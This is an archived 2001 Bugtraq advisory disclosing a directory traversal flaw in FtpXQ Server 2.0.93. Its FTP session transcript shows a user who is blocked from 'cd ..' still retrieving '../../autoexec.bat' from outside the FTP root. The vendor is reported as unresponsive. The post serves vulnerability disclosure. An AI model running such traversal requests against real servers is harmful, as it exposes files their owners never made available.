Bugtraq mailing list archives
Vulnerability in FtpXQ Server
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:32:19 -0500
----- Begin Hush Signed Message from joetesta () hushmail com ----- Vulnerability in FtpXQ Server Overview FtpXQ Server 2.0.93 is an ftp server available from http://www.datawizard.net and http://www.download.com. A vulnerability exists which allows an attacker to download files outside the ftp root. Details The following is an illustration of the problem. An ftp root of "c:\directory\directory" was used. % ftp localhost Connected to xxxxxxxxx.rh.rit.edu. 220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93). User (xxxxxxxxx.rh.rit.edu:(none)): test 331 OK need password. Password: 230 Welcome to DataWizard Technologies' FtpXQ FTP Server. ftp> pwd 257 Remote directory is "/directory/directory/" ftp> cd .. 550 Requested file action not taken---user does not have access. ftp> get ../../autoexec.bat 200 OK 150 Opening data connection. 226 Transfer completed. ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec. ftp> Solution No quick fix is possible. Vendor Status DataWizard Technologies, Inc. was contacted via <ftpxq () datawizard net> on Tuesday, February 20, 2001. No reply was received. - Joe Testa ( e-mail: joetesta () hushmail com / AIM: LordSpankatron ) ----- Begin Hush Signature v1.3 ----- C4CVJ/O5Iirb1y03vGfBsqdGexnj3/RUVEbhv0/w08ZTxg2pfofU7ZF+vHoXjaO8vxnV b23thdtkJfxlJJjeQa8/z1WKCkSf8X66v5/a07YoqLjFOqcQvvUQ1Y0uizNWgLlxB76y DRYXaEd1YR3zd4dPlpw9I9U8jXPkoxzrmDLq/wBHVLYXkV6Nu3jS7XSJNjthJB7phS5g UcrDiHkHVQrgqkVnNxBtdWwzK9zwzYd6mlcE153NBLmGERMBd87nN6phYKpYZ3dQU/iS 8qkQcw4CBv8bwM3B0sBffs/YCJB1JyL7dxlxS7CDE2Kmps8PjeGY0JvrOtuXjz1rMLU3 eiAALpHjcavmp2e44+Yo3it32Sbe2kwHiYDDhDbhfeXhfUNTMz7rK/HrtazI4ohYiIVf XkHU4XWoE9fhX5V72ffYuCz+uMzmKsjrbHHviG7SPRkdIbbOdww5TStGqRxNRYLFrP1Q SyBsEsdXaPnIpiYnulAbq/L1521pwOEosKIqbwl4DAws ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
Current thread:
- Vulnerability in FtpXQ Server joetesta (Feb 28)